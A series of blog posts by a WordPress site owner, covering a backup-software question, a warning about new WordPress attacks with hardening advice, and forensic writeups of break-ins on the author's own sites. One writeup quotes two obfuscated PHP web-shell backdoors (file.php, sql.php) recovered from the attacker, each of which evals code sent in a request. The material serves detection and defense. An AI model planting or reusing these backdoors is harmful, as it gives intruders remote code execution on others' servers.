If you use either of these Web hosting companies, I would suggest it might be prudent to examine your site carefully for security breaches, and to move to a different Web host as promptly as possible. It’s never a good sign when a Web host ignores reports that their servers have been breached by ISIS-affiliated hackers.

Call to the Lazyweb: Backup

I have a problem I’ve been beating my head against for a while now, and I’ve finally given up and decided to put this out there to the hive-mind of the Internet.

I have a laptop I want to keep regularly backed up. I have external hard drives that I use to do this, one that I carry with me and one that stays in my office in Portland. I use cloning software to duplicate the contents of the laptop onto them.

But I also want to do incremental backups, Dropbox-style, to a server I own.

I do have a paid Dropbox account and I do use it. (I also have a paid Microsoft OneDrive account.) But I’d really prefer to keep my files on my own server. What I want is very simple: the file and directory structure on the laptop to be mirrored automatically on my server, like such:

This should not be difficult. There is software that should be able to do this.

What I have tried:

Owncloud. They no longer support Mac OS X. Apparently they ran into problems supporting Unicode filenames and never solved it, so their solution was to drop OS X support.

BitTorrent Sync. This program is laughably bad. It works fine, if you’re only syncing a handful of files. I want to protect about 216,000 files, totaling a bit over 23 GB in size. BT Sync is strictly amateur-hour; it chokes at about 100,000 files and sits there indexing forever. I’ve looked at the BT Sync forums; they’re filled with people who have the same complaint. It’s not ready for prime time.

Crashplan. Crashplan encrypts all files and stores them in a proprietary format; it does not replicate the file and folder structure of the client on the server. I’m using it now but I don’t like that.

rsync. It’s slow and has a lot of problems with hundreds of thousands of files. The server is also on a dynamic IP address, and rsync has no way to resolve the address of the server when it changes.

Time Machine Server. Like CrashPlan, it keeps data in a proprietary format; it doesn’t simply replicate the existing file/folder structure, which is all I want. Like rsync, it has no way to cope with changes to the server’s IP address.

So you tell me, O Internets. What am I missing? What exists out there that will do what I want?

WordPress security issues: this is a bad one, folks

It’s been a bad week for WordPress. If you’re a WordPress user, I highly recommend you check as soon as possible to ensure your site is updated, all your plugins are up to date, and your site is free of unexpected users and malicious combat.

WordPress 4.4.2 was released February 2. This release fixes two known security flaws.

Hot on the heels of this security release come two worrying developments. The first, reported on over at the Wordfence blog, concerns a new WordPress attack platform that makes it easier than ever for criminals to attack WordPress sites. From the article:

The attack platform once fully installed provides an attacker with 43 attack tools they can then download, also from pastebin, with a single click. The functionality these tools provide includes:

  • Complete attack shells that let attackers manage the filesystem, access the database through a well designed SQL client, view system information, mass infect the system, DoS other systems, find and infect all CMS’s, view and manage user accounts both on CMS’s and the local operating system and much more.
  • An FTP brute force attack tool
  • A Facebook brute force attacker
  • A WordPress brute force attack script
  • Tools to scan for config files or sensitive information
  • Tools to download the entire site or parts thereof
  • The ability to scan for other attackers shells
  • Tools targeting specific CMS’s that let you change their configuration to host your own malicious code

The post includes a video of the attack platform in action.

Second, from Ars Technica, is a report of WordPress sites being hacked and made to download ransomware to visitors’ computers.

It’s not currently clear how the sites are being compromised, but it may be via an unknown zero-day security exploit. From the article:

According to a Monday blog post published by website security firm Sucuri, the compromised WordPress sites he observed have been hacked to include encrypted code at the end of all legitimate JavaScript files. The encrypted content is different from site to site…

It’s not yet clear how the WordPress sites are getting infected in the first place. It’s possible that administrators are failing to lock down the login credentials that allow the site content to be changed. It’s also feasible that attackers are exploiting an unknown vulnerability in the CMS, one of the plugins it uses, or the operating system they run on. Once a system is infected, however, the website malware installs a variety of backdoors on the webserver, a feature that’s causing many hacked sites to be repeatedly reinfected.

What can you do to protect your WordPress site? If you’re running WordPress, I strongly, strongly urge you to do the following:

  • Use strong admin passwords! I can not emphasize this enough. Use strong admin passwords! Criminals use automated tools to scan thousands of WordPress sites an hour looking for weak passwords. A normal WordPress install will be scanned dozens to hundreds of times a day. Use strong admin passwords!
  • Update all your sites RELIGIOUSLY. When a WordPres security patch is released, criminals will go to work examining the patch to see what it fixes, then develop automated tools to automatically hack unpatched sites. You may have only 24-48 hours between when a security patch comes out and when people start using tools that will automatically compromise sites that haven’t installed the patch. Turn on automatic updates. Keep on top of your site.
  • Install a tool like WordFence. This free plugin will protect your site by locking out people who use known attack tools or brute-force password guessing attempts. It will notify you by email of hack attempts and updates that need to be installed.
  • Install a tool like WPS Hide Login to move your login page to a hidden location, like /mysecretlogin instead of /wp-login.php. This will go miles toward securing your site.

I highly recommend you install the free Infinite WP tool as well. It’s a plugin plus a Web app that will notify you of updates and allow you to update one or many WordPress sites with just one button click. This is a great way to keep on top of security patches.

Also, absolutely do not assume you’re safe because you’re an obscure little blog that nobody cares about. The criminals will still find you. They use totally automated tools to scan for vulnerable WordPress sites looking for installations to exploit. It doesn’t matter if only you and your mom know about your site–criminals will find it and will exploit it.

Stay safe!

Update on WordPress hack

In this blog post, I talked about a recent WordPress hack attack on two of my WordPress sites that appears to be using a zero-day vulnerability to gain administrator access to WordPress sites.

I became aware of the attack when the security plugin WordFence notified me that someone had logged in to one of my sites using a non-existent administrator user from an IP address in St. Petersburg, Russia. The malicious individual had access to the site for eight minutes, during which he created several new admin users and uploaded a malicious file to the Plugins directory giving him the ability to execute code on the site. He was in the process of attempting to upload a file to the /wp-content/uploads directory, which I terminated when I kicked him out.

About fifteen minutes later, a similar attack took place on a second WordPress site I own. Again, the user created new administrator accounts, installed a plugin that allowed him to execute code on the server, and attempted to upload files, this time to the Themes directory. I cleaned the site and kicked him off. In both cases, I moved the login page to a different URL, hen observed while the same IP address attempted to access the old login URL.

Last night, a third site I own was compromised in the same way. This site is not yet in use, and had no content, so I observed the actions of the user.

The hostile user created new admin users, uploaded the same plugin to the plugins directory, then uploaded additional files to the /wp-content/uploads directory and the /themes directory. I downloaded these files for analysis.

The files were both PHP files, uploaded to the following locations:

/wp-content/themes/twentyfifteen/inc/file.php
/wp-content/uploads/2009/sql.php

Their contents are as follows:

file.php

<?php $sF=”PCT4BA6ODSE_”;$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}[‘n703018’])) {eval($s21(${$s20}[‘n703018’]));}?>

sql.php

<?php $qV=”stop_”;$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}[‘qbc8a20’])){eval(${$s20}[‘qbc8a20’]);}?>

Again, these malicious files appear designed to allow the attacker to execute code on compromised servers.

I urge WordPress users to take the mitigating actions I describe in the previous post, linked to above, and to check their systems carefully for the presence of malicious plugins (probably named “research_plugin_” followed by a random string), unauthorized admin users, and files whose contents are anything like what I describe above. These files may be present in one or more places in the WordPress Themes or Uploads directories.

Analysis of a new WordPress attack

I run a number of WordPress sites. Running a WordPress site is an invitation to hack attacks; it’s such a popular platform that it provides an appealing target for hackers. On top of that, I have a somewhat tumultuous relationship with Eastern European organized crime that extends back quite a number of years (I’ve worked with law enforcement on high-profile attacks like this one), so I get a fair amount of attention from folks trying to DDoS, penetrate, or otherwise attack my sites.

The Attack

Last night, a hacker successfully penetrated one of the WordPress sites I own. I use a WordPress plugin called Word Fence that notifies me whenever anyone with administrator access logs in to one of my sites, so I responded and kicked the attacker out within eight minutes. Approximately fifteen minutes later, an attacker from the same IP address logged in to another WordPress site I run. I kicked him out of that site a few minutes later.

WordPress attackers often modify core WordPress files to install back doors, so I downloaded the contents of both sites, then did a nuke-and-pave with a new known-good WordPress install and moved the database to a different location.

I am still analyzing the attack, but there are a number of factors that have raised my suspicion that this may be a novel zero-day attack, not the least of which is the attacker gained access to both sites on the first login attempt without brute-forcing an administrator password (and yes, I use very robust passwords). Furthermore, the attacker logged in to an account named “admin,” and I do not create WordPress administrator accounts with that name–I always use different names for the admin accounts.

I’ve done a first pass forensic analysis of the attack. These are the characteristics I observed in both attacks:

  • The first thing the attacker does is create several new administrator accounts. These accounts have names such as “administrator;” “admin;” “admin” followed by a random two or three digit number (such as “admin52”); and “root.”
  • The attacker then creates new directories in the /plugins directory located in /wp-content. These directories are named “research_plugin_” followed by a random string of letters and numbers, such as “research_plugin_2hAs”.
  • Next, the attacker uploads malicious PHP files into these “research_plugin” directories. The PHP files are named “research_plugin.php”. Their content is located under the cut below.

Click here to see the content of the research_plugin.php file